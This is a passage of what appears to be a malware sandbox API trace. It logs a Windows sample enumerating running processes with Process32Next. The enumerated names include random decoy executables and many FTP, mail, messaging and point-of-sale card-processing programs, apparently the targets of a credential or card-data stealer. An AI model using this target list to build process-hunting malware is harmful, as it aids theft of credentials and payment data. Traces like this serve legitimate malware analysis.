hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.376] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0286.378] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.379] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.381] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.383] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.384] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.386] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.451] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.452] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0286.454] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0286.455] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0286.456] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.458] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0286.459] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0286.461] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0286.462] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0286.464] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.466] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0286.467] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0286.469] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.470] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0286.472] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0286.473] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0286.474] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0286.476] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0286.477] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0286.479] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0286.480] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0286.482] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0286.483] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0286.485] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0286.486] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0286.488] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0286.489] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0286.491] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0286.492] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0286.494] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0286.495] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0286.554] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0286.556] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0286.559] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0286.561] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0286.564] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0286.566] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0286.568] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0286.570] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0286.572] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0286.575] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0286.577] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0286.580] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0286.582] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0286.585] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0286.587] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0286.623] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0286.626] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0286.628] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0286.631] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0286.633] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0286.636] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0286.638] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0286.641] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0286.643] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0286.645] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0286.648] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0286.650] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0286.652] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0286.655] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0286.657] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0286.659] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0286.662] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0286.664] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0286.666] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0286.734] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0286.737] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0286.740] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0286.742] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0286.744] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0286.749] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0286.752] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0286.754] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0286.756] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0286.759] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0286.761] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, 